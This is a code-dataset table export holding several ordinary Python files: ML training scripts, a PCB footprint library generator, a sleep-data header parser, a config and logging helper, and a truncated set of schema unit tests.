| hexsha (stringlengths 40-40) | size (int64, 5-2.06M) | ext (stringclasses, 10 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 3-248) | max_stars_repo_name (stringlengths 5-125) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64, 1-191k, nullable) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24, nullable) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24, nullable) | max_issues_repo_path (stringlengths 3-248) | max_issues_repo_name (stringlengths 5-125) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64, 1-67k, nullable) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24, nullable) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24, nullable) | max_forks_repo_path (stringlengths 3-248) | max_forks_repo_name (stringlengths 5-125) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64, 1-105k, nullable) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24, nullable) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24, nullable) | content (stringlengths 5-2.06M) | avg_line_length (float64, 1-1.02M) | max_line_length (int64, 3-1.03M) | alphanum_fraction (float64, 0-1) | count_classes (int64, 0-1.6M) | score_classes (float64, 0-1) | count_generators (int64, 0-651k) | score_generators (float64, 0-1) | count_decorators (int64, 0-990k) | score_decorators (float64, 0-1) | count_async_functions (int64, 0-235k) | score_async_functions (float64, 0-1) | count_documentation (int64, 0-1.04M) | score_documentation (float64, 0-1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ac844765c4ce5c32dfa9aa2da4c0094d7fbd95aa | 154 | py | Python | convert.py | Resist4263/span-aste-1 | 13815a262638592506b445315d03df8db965947b | ["Apache-2.0"] | null | null | null | convert.py | Resist4263/span-aste-1 | 13815a262638592506b445315d03df8db965947b | ["Apache-2.0"] | null | null | null | convert.py | Resist4263/span-aste-1 | 13815a262638592506b445315d03df8db965947b | ["Apache-2.0"] | null | null | null |
from gensim.scripts.glove2word2vec import glove2word2vec
(count, dimensions) = glove2word2vec("dataset/glove.42B.300d.txt", "dataset/cropus/42B_w2v.txt")
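# Usage sketch (an assumption, not part of the conversion script above; requires gensim):
# once glove2word2vec has rewritten the GloVe file in word2vec format, the output path
# used above can be loaded as ordinary keyed vectors and queried.
from gensim.models import KeyedVectors

vectors = KeyedVectors.load_word2vec_format("dataset/cropus/42B_w2v.txt", binary=False)
print(vectors.most_similar("good", topn=5))  # nearest neighbours by cosine similarity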
| 51.333333 | 96 | 0.811688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.363636 |
ac854af38b11787c1689126c56bfc2405c99c2c4 | 4,970 | py | Python | src/pcbLibraryManager/libraries/librarySwitches.py | NiceCircuits/pcbLibraryManager | df83f24b5a558e0f7f72629d9ef7c82fcb9e6718 | ["CC0-1.0"] | null | null | null | src/pcbLibraryManager/libraries/librarySwitches.py | NiceCircuits/pcbLibraryManager | df83f24b5a558e0f7f72629d9ef7c82fcb9e6718 | ["CC0-1.0"] | 1 | 2016-04-16T08:16:36.000Z | 2016-04-16T08:16:36.000Z | src/pcbLibraryManager/libraries/librarySwitches.py | NiceCircuits/pcbLibraryManager | df83f24b5a558e0f7f72629d9ef7c82fcb9e6718 | ["CC0-1.0"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 19 22:17:33 2015
@author: piotr at nicecircuits.com
"""
from libraryManager.library import libraryClass
from footprints.footprintSmdDualRow import footprintSmdDualRow
from libraryManager.part import part
from libraryManager.symbol import symbol
from libraryManager.symbolPrimitive import *
from libraryManager.footprintPrimitive import *
from libraryManager.defaults import defaults
from libraryManager.generateLibraries import generateLibraries
class librarySwitches(libraryClass):
"""
"""
def __init__(self):
super().__init__("niceSwitches")
for v in ["H","V"]:
for h in [4.3, 5, 7, 9.5, 13, 19]:
self.parts.append(partMicroswitchSmt(h,v))
self.parts.append(partMicroswitchSmt6x4(v))
class partMicroswitchSmt(part):
"""
Default SMT microswitch
"""
def __init__(self, height, variant="H"):
variantStr = "_V" if variant=="V" else ""
name = "MicroswitchSmt-%1.1f%s" % (height, variantStr)
super().__init__(name, defaults.switchRefDes)
self.symbols.append(symbolButton(variant=variant))
for density in ["N", "L", "M"]:
self.footprints.append(footprintMicroswitchSmt(density, height))
class partMicroswitchSmt6x4(part):
"""
SMT microswitch 6x4mm
"""
def __init__(self,variant="H"):
variantStr = "_V" if variant=="V" else ""
name = "MicroswitchSmt6x4%s" % variantStr
super().__init__(name, defaults.switchRefDes)
self.symbols.append(symbolButton(variant=variant))
for density in ["N", "L", "M"]:
self.footprints.append(footprintMicroswitchSmt6x4(density))
class symbolButton(symbol):
"""Button symbol
"""
def __init__(self, name="button", refDes=defaults.switchRefDes, showPinNames=False,\
showPinNumbers=False, pinNumbers=[1,2], variant="H"):
super().__init__(name, refDes, showPinNames, showPinNumbers)
for i in range(2):
self.pins.append(symbolPin(i+1, pinNumbers[i], [200 if i else -200,0],\
100, pinType.passive, rotation=180 if i else 0))
self.primitives.append(symbolCircle(defaults.symbolLineWidth,\
[75 if i else -75, 0], 25))
self.primitives.append(symbolLine(defaults.symbolThickLineWidth,\
-100, 50, 100, 50))
self.primitives.append(symbolRectangle(0, -25, 50, 25, 75,\
filled=fillType.foreground))
if variant=="H":
self.nameObject.position=[0, 120]
self.valueObject.position=[0, -80]
elif variant=="V":
self.movePrimitives([0,0],90)
self.nameObject.position=[50, 50]
self.nameObject.align=textAlign.centerLeft
self.valueObject.position=[50, -50]
self.valueObject.align=textAlign.centerLeft
else:
raise ValueError("unsupported variant %s" % variant)
class footprintMicroswitchSmt(footprintSmdDualRow):
"""Default SMT microswitch
"""
def __init__(self, density, height=4.3, name="", alternativeLibName="niceSwitches"):
"""
density: "L" - least, "N" - nominal, "M" - most
"""
if not name:
name="MicroswitchSmd-%1.1f_%s" % (height, density)
# pads
padSizes={"L":[1.3,2], "N":[1.3,2], "M":[1.4,2.5]}
padSpan={"L":8.5, "N":8.5, "M":9}
super().__init__(name, alternativeLibName,\
pinCount= 4,\
pitch=4.5,\
padSpan=padSpan[density],\
padDimensions=padSizes[density],\
bodyDimensions=[6.2, 6.2, 3.6],\
originMarkSize=defaults.originMarkSize,
leadDimensions=[1.9, 0.7, 1],\
court=defaults.court[density],\
firstPinMarker=False)
self.addCylinder3Dbody([0,0,0], [3.5,3.5,height])
self.renamePads([1,2,2,1])
class footprintMicroswitchSmt6x4(footprintSmdDualRow):
"""
SMT microswitch 6x4mm
"""
def __init__(self, density, name="", alternativeLibName="niceSwitches"):
"""
density: "L" - least, "N" - nominal, "M" - most
"""
if not name:
name="MicroswitchSmd6x4_%s" % ( density)
# pads
padSizes={"L":[1.2,1.3], "N":[1.4,1.5], "M":[1.6,1.7]}
padSpan={"L":7.7, "N":7.8, "M":7.9}
super().__init__(name, alternativeLibName,\
pinCount= 2,\
pitch=4.5,\
padSpan=padSpan[density],\
padDimensions=padSizes[density],\
bodyDimensions=[3.9,6.3,2],\
originMarkSize=defaults.originMarkSize,
leadDimensions=[1, 0.6, 1],\
court=defaults.court[density],\
firstPinMarker=False)
self.addSimple3Dbody([0,0,0], [1.2,2.6,2.5],file="cube_metal")
if __name__ == "__main__":
generateLibraries([librarySwitches()])
| 38.230769 | 88 | 0.597988 | 4,348 | 0.874849 | 0 | 0 | 0 | 0 | 0 | 0 | 723 | 0.145473 |
ac85b889248a7fe66df90411b1896a2b3cc25961 | 131 | py | Python | Codeforces/problems/0799/A/799A.py | object-oriented-human/competitive | 9e761020e887d8980a39a64eeaeaa39af0ecd777 | ["MIT"] | 2 | 2021-07-27T10:46:47.000Z | 2021-07-27T10:47:57.000Z | Codeforces/problems/0799/A/799A.py | foooop/competitive | 9e761020e887d8980a39a64eeaeaa39af0ecd777 | ["MIT"] | null | null | null | Codeforces/problems/0799/A/799A.py | foooop/competitive | 9e761020e887d8980a39a64eeaeaa39af0ecd777 | ["MIT"] | null | null | null |
import math
n, t, k, d = map(int, input().split())
x = math.ceil(n/k) * t
if (d + t) < x:
print("YES")
else:
print("NO")
| 13.1 | 38 | 0.503817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.068702 |
ac8615af3d9f334ab252cb1f100f3ad3f649766c | 3,159 | py | Python | model.py | ganeshpc/flower-classification | aa836389f04b40a4368d4c1bf2c13cc44ee51af1 | ["MIT"] | null | null | null | model.py | ganeshpc/flower-classification | aa836389f04b40a4368d4c1bf2c13cc44ee51af1 | ["MIT"] | null | null | null | model.py | ganeshpc/flower-classification | aa836389f04b40a4368d4c1bf2c13cc44ee51af1 | ["MIT"] | null | null | null |
import keras
from keras import layers
from keras.layers import Dropout, Dense
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import tensorflow_hub as hub
import cv2
import pandas as pd
IMAGE_SHAPE = (224, 224) #(HEIGHT, WIDTH)
TRAINING_DATA_DIRECTORY = '/content/drive/My Drive/Colab Notebooks/FlowerClassification/data/TrainingData'
datagen_kwargs = dict(rescale=1./255, validation_split=.2)
def get_validation_generator():
validation_datagen = ImageDataGenerator(**datagen_kwargs)
validation_generator = validation_datagen.flow_from_directory(
TRAINING_DATA_DIRECTORY,
subset='validation',
shuffle=True,
target_size=IMAGE_SHAPE
)
return validation_generator
def get_training_generator():
training_datagen = ImageDataGenerator(**datagen_kwargs)
training_generator = training_datagen.flow_from_directory(
TRAINING_DATA_DIRECTORY,
subset='training',
shuffle=True,
target_size=IMAGE_SHAPE
)
return training_generator
def get_mobile_net_model(num_classes):
    # num_classes is the number of flower categories, e.g. training_generator.num_classes
    model = keras.Sequential()
    model.add(hub.KerasLayer(
        'https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4',
        output_shape=[1280],
        trainable=False)
    )
    model.add(Dropout(0.4))
    model.add(Dense(num_classes, activation='softmax'))
    model.build([None, 224, 224, 3])
    model.summary()
    return model
def train_model(model, training_generator=None, validation_generator=None):
    if training_generator is None:
        training_generator = get_training_generator()
    if validation_generator is None:
        validation_generator = get_validation_generator()
optimizer = keras.optimizers.Adam(lr=1e-3)
model.compile(
optimizer=optimizer,
loss='categorical_crossentropy',
metrics=['acc']
)
    steps_per_epoch = int(np.ceil(
        training_generator.samples / training_generator.batch_size
    ))
    validation_steps_per_epoch = int(np.ceil(
        validation_generator.samples / validation_generator.batch_size
    ))
hist = model.fit(
training_generator,
epochs=20,
verbose=1,
steps_per_epoch=steps_per_epoch,
validation_data=validation_generator,
validation_steps=validation_steps_per_epoch
).history
print('model trained')
model.save('/content/drive/My Drive/Colab Notebooks/FlowerClassification/model_100_epochs.h5')
print('model saved')
    # convert the returned history dictionary to a pandas dataframe
    hist_df = pd.DataFrame(hist)
# save to json
hist_json_file = 'history_100_epochs.json'
with open(hist_json_file, mode='w') as f:
hist_df.to_json(f)
return model
def evaluate_model(model, validation_generator=None):
    if validation_generator is None:
        validation_generator = get_validation_generator()
    steps = int(np.ceil(validation_generator.samples / validation_generator.batch_size))
    final_loss, final_accuracy = model.evaluate(validation_generator, steps=steps)
    print("Final Loss: ", final_loss)
    print("Final accuracy: ", final_accuracy * 100)
if __name__ == '__main__':
    training_generator = get_training_generator()
    validation_generator = get_validation_generator()
    model = get_mobile_net_model(training_generator.num_classes)
    model = train_model(model, training_generator, validation_generator)
    evaluate_model(model, validation_generator)
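# Hedged inference sketch (assumptions: the saved .h5 file exists and the image path
# is a placeholder). Reloading the model requires mapping the TF-Hub layer back to
# hub.KerasLayer via custom_objects.
def predict_single_image(model_path, image_path):
    model = keras.models.load_model(model_path,
                                    custom_objects={'KerasLayer': hub.KerasLayer})
    image = cv2.imread(image_path)                      # note: OpenCV loads BGR
    image = cv2.resize(image, IMAGE_SHAPE) / 255.0      # same rescaling as training
    probabilities = model.predict(np.expand_dims(image, axis=0))[0]
    return int(np.argmax(probabilities))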
| 24.679688 | 106 | 0.709085 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 478 | 0.151314 |
ac86900c935920ddf1e7d5f2d9ab4b10680baaec | 12,421 | py | Python | psg_utils/io/header/header_standardizers.py | perslev/sleep-utils | 9f9edf67f4cac6d8361243b4153bfe6351314844 | ["MIT"] | 1 | 2022-03-17T10:37:17.000Z | 2022-03-17T10:37:17.000Z | psg_utils/io/header/header_standardizers.py | perslev/sleep-utils | 9f9edf67f4cac6d8361243b4153bfe6351314844 | ["MIT"] | null | null | null | psg_utils/io/header/header_standardizers.py | perslev/sleep-utils | 9f9edf67f4cac6d8361243b4153bfe6351314844 | ["MIT"] | null | null | null |
"""
A set of functions for extracting header information from PSG objects
Typically only used internally from unet.io.header.header_extractors
Each function takes some PSG or header-like object and returns a dictionary with at least
the following keys:
{
'n_channels': int,
'channel_names': list of strings,
'sample_rate': int
'date': datetime or None
'length': int
}
Note: length gives the number of samples, divide by sample_rate to get length_sec
"""
import logging
import warnings
import numpy as np
import h5py
from datetime import datetime
from psg_utils.errors import (MissingHeaderFieldError, HeaderFieldTypeError,
LengthZeroSignalError, H5VariableAttributesError,
VariableSampleRateError, FloatSampleRateWarning)
logger = logging.getLogger(__name__)
def _assert_header(header):
"""
Checks that a standardized header:
1) contains the right field names
2) each value has an expected type
3) the 'length' value is greater than 0
Args:
header: dict
Returns: dict
"""
field_requirements = [
("n_channels", [int]),
("channel_names", [list]),
("sample_rate", [int]),
("date", [datetime, type(None)]),
("length", [int])
]
for field, valid_types in field_requirements:
if field not in header:
raise MissingHeaderFieldError(f"Missing value '{field}' from header '{header}'. "
"This could be an error in the code implementation. "
"Please raise this issue on GitHub.")
type_ = type(header[field])
if type_ not in valid_types:
raise HeaderFieldTypeError(f"Field {field} of type {type_} was not expected, expected one of {valid_types}")
if header['length'] <= 0:
raise LengthZeroSignalError(f"Expected key 'length' to be a non-zero integer, "
f"but header {header} has value {header['length']}")
# Warn on duplicate channels
from psg_utils.io.channels.utils import check_duplicate_channels
check_duplicate_channels(header['channel_names'], raise_or_warn="warn")
return header
def _sample_rate_as_int(sample_rate, raise_or_warn='warn'):
"""
Returns the sample rate rounded to the nearest whole integer.
If the integer sample rate is not exactly (as determined by np.isclose) equal to the original,
possibly floating, value a warning is issued if raise_or_warn="warn" or a FloatSampleRateWarning
is raised if raise_or_warn="raise".
Raises ValueError if raise_or_warn not in ('raise', 'warn', 'warning').
Args:
sample_rate: int, float sample rate
Returns:
sample_rate, int
"""
new_sample_rate = int(np.round(sample_rate))
if not np.isclose(new_sample_rate, sample_rate):
s = f"The loaded file has a float sample rate of value {sample_rate} which is not exactly equal to the " \
f"rounded integer value of {new_sample_rate}. Please note: Integer value {new_sample_rate} will be used."
if raise_or_warn.lower() == "raise":
raise FloatSampleRateWarning(s)
elif raise_or_warn.lower() in ("warn", "warning"):
warnings.warn(s, FloatSampleRateWarning)
else:
raise ValueError("raise_or_warn argument must be one of 'raise' or 'warn'.")
return new_sample_rate
def _standardized_edf_header(raw_edf, channel_names_overwrite=None):
"""
Header extraction function for RawEDF and Raw objects.
Reads the number of channels, channel names and sample rate properties
If existing, reads the date information as well.
channel_names_overwrite allows passing a list of channel names to use instead of
those loaded by MNE per default. This is useful e.g. to set the raw EDF names in the
header instead of the truncated / renamed (on duplicates) used by MNE.
Returns:
Header information as dict
"""
# Each tuple below follows the format:
# 1) output name, 2) edf_obj name, 3) function to apply to the read
# value, 4) whether a missing value should raise an error.
header_map = [("n_channels", "nchan", int, True),
("channel_names", "ch_names", list, True),
("sample_rate", "sfreq", _sample_rate_as_int, True),
("date", "meas_date", datetime.utcfromtimestamp, False)]
if isinstance(raw_edf.info["meas_date"], (tuple, list)):
assert raw_edf.info["meas_date"][1] == 0
raw_edf.info["meas_date"] = raw_edf.info["meas_date"][0]
header = {}
for renamed, org, transform, raise_err in header_map:
value = raw_edf.info.get(org)
try:
value = transform(value)
except Exception as e:
if raise_err:
raise HeaderFieldTypeError("Missing or invalid value in EDF file for key {} "
"- got {}".format(org, value)) from e
header[renamed] = value
header["length"] = len(raw_edf)
header["channel_names"] = list(channel_names_overwrite) or header["channel_names"]
return _assert_header(header)
def _standardized_wfdb_header(wfdb_record):
"""
Header extraction function for WFDB Record objects.
Reads the number of channels, channel names and sample rate properties
If existing, reads the date information as well.
Returns:
Header information as dict
"""
# Each tuple below follows the format:
# 1) output name, 2) record_obj name, 3) function to apply to the read
# value, 4) whether a missing value should raise an error.
header_map = [("n_channels", "n_sig", int, True),
("channel_names", "sig_name", list, True),
("sample_rate", "fs", _sample_rate_as_int, True),
("date", "base_date", datetime.utcfromtimestamp, False),
("length", "sig_len", int, True)]
header = {}
for renamed, org, transform, raise_err in header_map:
value = getattr(wfdb_record, org, None)
try:
value = transform(value)
except Exception as e:
if raise_err:
raise HeaderFieldTypeError("Missing or invalid value in WFDB file for key {} "
"- got {}".format(org, value)) from e
header[renamed] = value
return _assert_header(header)
def _traverse_h5_file(root_node, attributes=None):
attributes = dict((attributes or {}))
attributes.update(root_node.attrs)
results = {}
if isinstance(root_node, h5py.Dataset):
# Leaf node
attributes["length"] = len(root_node)
results[root_node.name] = attributes
else:
for key in root_node:
results.update(_traverse_h5_file(root_node[key], attributes))
return results
def _get_unique_value(items):
"""
Takes a list of items, checks that all are equal (in value, ==) and returns the unique value.
Returns None if the list is empty.
Raises H5VariableAttributesError if the items are not all equal.
Args:
items: List
Returns:
The unique item in list
"""
if len(items) == 0:
return None
for item in items[1:]:
if item != items[0]:
raise H5VariableAttributesError(f"The input list '{items}' contains more than 1 unique value")
return items[0]
def _standardized_h5_header(h5_file, channel_group_name="channels"):
"""
Header extraction function for h5py.File objects.
The object must:
- Have an attribute 'sample_rate'
- Have a group named {channel_group_name} which stores the data for all channels as
Dataset entries under the group (can be nested in deeper groups too)
Can have:
- An attribute 'date' which gives a date string or unix timestamp integer
Currently raises an error if any attribute in ('date', 'sample_rate', 'length') are not equal among all
datasets in the archive.
All attributes may be set at any node, and will affect any non-attributed node deeper in the tree.
E.g. setting the 'sample_rate' attribute on the root node will have it affect all datasets, unless
the attribute is set on deeper nodes too, in which case the latter will overwrite the root attribute for
all its nested, un-attributed children.
Returns:
Header information as dict
"""
# Traverse the h5 archive for datasets and assigned attributes
h5_content = _traverse_h5_file(h5_file[channel_group_name], attributes=h5_file.attrs)
header = {
"channel_names": [],
"channel_paths": {}, # will store channel_name: channel path entries
"sample_rate": [],
"date": [],
"length": []
}
for channel_path, attributes in h5_content.items():
channel_name = channel_path.split("/")[-1]
header["channel_paths"][channel_name] = channel_path
header["channel_names"].append(channel_name)
header["sample_rate"].append(attributes.get("sample_rate"))
header["date"].append(attributes.get("date"))
header["length"].append(attributes.get("length"))
header["n_channels"] = len(h5_content)
# Ensure all dates, lengths and sample rate attributes are equal
# TODO: Remove this restriction at least for sample rates; requires handling at PSG loading time
try:
header["date"] = _get_unique_value(header["date"])
header["sample_rate"] = _sample_rate_as_int(_get_unique_value(header["sample_rate"]))
header["length"] = int(_get_unique_value(header["length"]))
except H5VariableAttributesError as e:
raise H5VariableAttributesError("Datasets stored in the specified H5 archive differ with respect to one or "
"multiple of the following attributes: 'date', 'sampling_rate', 'length'. "
"All datasets must currently match with respect to those attributes.") from e
# Get datetime date or set to None
date = header["date"]
if not isinstance(date, str) and (isinstance(date, int) or np.issubdtype(date, np.integer)):
date = datetime.utcfromtimestamp(date)
elif not isinstance(date, datetime):
date = None
header["date"] = date
return _assert_header(header)
def _standardized_bin_header(raw_header):
"""
Header extraction function for custom dict type headers for data in .bin files.
Raw header has structure:
{"CHX": [list of channel inds], "NAME": [list of channel names],
"TYPE": [list of channel types], "FS": [list of channel sample rates]}
All values stored in the header are strings and should be cast to ints. etc as appropriate
for header standardization.
Currently raises an error if all attribute in header["FS"] are not equal
(i.e., same sample rate is required for all channels).
Returns:
Header information as dict
"""
# Assert upper case keys
raw_header = {key.upper(): values for key, values in raw_header.items()}
# Order header entries according to CHX column
    order = np.argsort(np.array(raw_header['CHX'], dtype=int))  # np.int was removed in NumPy >= 1.24
raw_header = {key: ([entry[i] for i in order]
if isinstance(entry, (list, tuple, np.ndarray))
else entry)
for key, entry in raw_header.items()}
# Assert that all samples rates are equal
sample_rates = np.array(raw_header["FS"], dtype=np.int32)
if not (sample_rates[0] == sample_rates).all():
raise VariableSampleRateError(f"Sample rates in header {raw_header} are not "
f"all equal with rates: {sample_rates}. "
f"The data loaders for .bin formatted files currently "
f"support only files with all channels sampled at equal rates.")
# Build standardized header
header = {
"n_channels": len(raw_header["NAME"]),
"channel_names": list(raw_header["NAME"]),
"sample_rate": _sample_rate_as_int(sample_rates[0]),
"date": None,
"length": int(raw_header["LENGTH"]),
"channel_types": [type_.upper() for type_ in raw_header.get("TYPE", [])]
}
return _assert_header(header)
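# Illustrative sketch of the contract described in the module docstring: every
# standardizer above must return a dict that passes _assert_header. The values
# below are made up for the example.
if __name__ == "__main__":
    example_header = {
        "n_channels": 2,
        "channel_names": ["EEG Fpz-Cz", "EOG horizontal"],
        "sample_rate": 100,          # Hz
        "date": None,                # datetime or None
        "length": 360000,            # samples; length / sample_rate = 3600 seconds
    }
    print(_assert_header(example_header))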
| 41.821549 | 120 | 0.646164 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,456 | 0.519765 |
ac8b1415e78b57c9f8a18413e55459164d6e3fa4 | 2,620 | py | Python | py/hover/cfg.py | HomeSmartMesh/raspi | 43ecd07c130144c72d7c7da677eab1980d555cc2 | ["MIT"] | 16 | 2019-12-19T09:23:05.000Z | 2022-01-25T18:34:36.000Z | py/hover/cfg.py | HomeSmartMesh/raspi | 43ecd07c130144c72d7c7da677eab1980d555cc2 | ["MIT"] | 4 | 2020-06-07T08:13:29.000Z | 2021-09-04T09:34:37.000Z | py/hover/cfg.py | HomeSmartMesh/raspi | 43ecd07c130144c72d7c7da677eab1980d555cc2 | ["MIT"] | 3 | 2020-08-28T13:00:30.000Z | 2020-12-17T09:10:19.000Z |
import sys,os
import json
import logging as log
import socket
from collections import OrderedDict
import datetime
from platform import system as system_name # Returns the system/OS name
from subprocess import call as system_call # Execute a shell command
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Ping command count option as function of OS
param = '-n' if system_name().lower()=='windows' else '-c'
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
# Pinging
return system_call(command) == 0
# -------------------- config --------------------
def get_local_json():
"""fetches the config.json file in the local directory
if config_hostname.json is found it is used over the default one
"""
config = None
dirname = os.path.dirname(sys.argv[0])
if(len(dirname) == 0):
dirname = "."
config_file = dirname+'/'+"config_"+socket.gethostname()+".json"
if(os.path.isfile(config_file)):
print("loading: ",config_file)
config = json.load(open(config_file))
else:
config_file = dirname+'/'+"config.json"
if(os.path.isfile(config_file)):
print("loading: %s",config_file)
config = json.load(open(config_file))
else:
print("Fatal error 'config.json' not found")
return config
# -------------------- config --------------------
def get_local_nodes(nodes_file):
nodes = json.load(open(nodes_file),object_pairs_hook=OrderedDict)
return nodes
def configure_log(logger_name):
global_config = get_local_json()
config = global_config["log"]
log_level_map = {
"Debug" :10,
"Info" :20,
"Warning" :30,
"Error" :40,
"Critical" :50
}
#if(os.path.isfile(config["logfile"])):
for handler in log.root.handlers[:]:
log.root.removeHandler(handler)
log.basicConfig( filename=config["logfile"],
level=log_level_map[config["level"]],
format='%(asctime)s %(name)s %(levelname)-8s %(message)s',
datefmt='%d %H:%M:%S'
)
log.getLogger('').addHandler(log.StreamHandler())
log.info("====> '%s' started logging with level '%s' @ '%s'"%(logger_name,config["level"],str(datetime.datetime.utcnow())))
#else:
# print("Log file not available : %s"%(config["logfile"]))
return global_config
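# Hedged usage sketch: assumes a config.json (or config_<hostname>.json) next to the
# script containing at least {"log": {"logfile": "hover.log", "level": "Info"}}.
if __name__ == '__main__':
    global_config = configure_log("hover")   # sets up file + console logging, returns the full config
    log.info("gateway reachable: %s", ping("127.0.0.1"))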
| 34.473684 | 127 | 0.594656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 975 | 0.372137 |
ac8b3ba743761efaa0df8e7bef2daa017b63a13e | 27,156 | py | Python | guillotina/schema/tests/test__bootstrapfields.py | diefenbach/guillotina | a8c7247fca8294752901f643b35c5ed1c5dee76d | ["BSD-2-Clause"] | null | null | null | guillotina/schema/tests/test__bootstrapfields.py | diefenbach/guillotina | a8c7247fca8294752901f643b35c5ed1c5dee76d | ["BSD-2-Clause"] | null | null | null | guillotina/schema/tests/test__bootstrapfields.py | diefenbach/guillotina | a8c7247fca8294752901f643b35c5ed1c5dee76d | ["BSD-2-Clause"] | null | null | null |
##############################################################################
#
# Copyright (c) 2012 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# flake8: noqa
import unittest
class ValidatedPropertyTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import ValidatedProperty
return ValidatedProperty
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test___set___not_missing_w_check(self):
_checked = []
def _check(inst, value):
_checked.append((inst, value))
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop', _check)
inst = Test()
inst.prop = 'PROP'
self.assertEqual(inst._prop, 'PROP')
self.assertEqual(_checked, [(inst, 'PROP')])
def test___set___not_missing_wo_check(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test(ValueError)
def _provoke(inst):
inst.prop = 'PROP'
self.assertRaises(ValueError, _provoke, inst)
self.assertEqual(inst._prop, None)
def test___set___w_missing_wo_check(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test(ValueError)
inst.prop = DummyInst.missing_value
self.assertEqual(inst._prop, DummyInst.missing_value)
def test___get__(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst._prop = 'PROP'
self.assertEqual(inst.prop, 'PROP')
class DefaultPropertyTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import DefaultProperty
return DefaultProperty
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test___get___wo_defaultFactory_miss(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst.defaultFactory = None
def _provoke(inst):
return inst.prop
self.assertRaises(KeyError, _provoke, inst)
def test___get___wo_defaultFactory_hit(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst.defaultFactory = None
inst._prop = 'PROP'
self.assertEqual(inst.prop, 'PROP')
def test__get___wo_defaultFactory_in_dict(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst._prop = 'PROP'
self.assertEqual(inst.prop, 'PROP')
def test___get___w_defaultFactory_not_ICAF_no_check(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test(ValueError)
def _factory():
return 'PROP'
inst.defaultFactory = _factory
def _provoke(inst):
return inst.prop
self.assertRaises(ValueError, _provoke, inst)
def test___get___w_defaultFactory_w_ICAF_w_check(self):
from zope.interface import directlyProvides
from guillotina.schema._bootstrapinterfaces \
import IContextAwareDefaultFactory
_checked = []
def _check(inst, value):
_checked.append((inst, value))
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop', _check)
inst = Test(ValueError)
inst.context = object()
_called_with = []
def _factory(context):
_called_with.append(context)
return 'PROP'
directlyProvides(_factory, IContextAwareDefaultFactory)
inst.defaultFactory = _factory
self.assertEqual(inst.prop, 'PROP')
self.assertEqual(_checked, [(inst, 'PROP')])
self.assertEqual(_called_with, [inst.context])
class FieldTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Field
return Field
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
field = self._makeOne()
self.assertEqual(field.__name__, '')
self.assertEqual(field.__doc__, '')
self.assertEqual(field.title, '')
self.assertEqual(field.description, '')
self.assertEqual(field.required, True)
self.assertEqual(field.readonly, False)
self.assertEqual(field.constraint(object()), True)
self.assertEqual(field.default, None)
self.assertEqual(field.defaultFactory, None)
self.assertEqual(field.missing_value, None)
self.assertEqual(field.context, None)
def test_ctor_w_title_wo_description(self):
field = self._makeOne('TITLE')
self.assertEqual(field.__name__, '')
self.assertEqual(field.__doc__, 'TITLE')
self.assertEqual(field.title, 'TITLE')
self.assertEqual(field.description, '')
def test_ctor_wo_title_w_description(self):
field = self._makeOne(description='DESC')
self.assertEqual(field.__name__, '')
self.assertEqual(field.__doc__, 'DESC')
self.assertEqual(field.title, '')
self.assertEqual(field.description, 'DESC')
def test_ctor_w_both_title_and_description(self):
field = self._makeOne('TITLE', 'DESC', 'NAME')
self.assertEqual(field.__name__, 'NAME')
self.assertEqual(field.__doc__, 'TITLE\n\nDESC')
self.assertEqual(field.title, 'TITLE')
self.assertEqual(field.description, 'DESC')
def test_ctor_order_madness(self):
klass = self._getTargetClass()
order_before = klass.order
field = self._makeOne()
order_after = klass.order
self.assertEqual(order_after, order_before + 1)
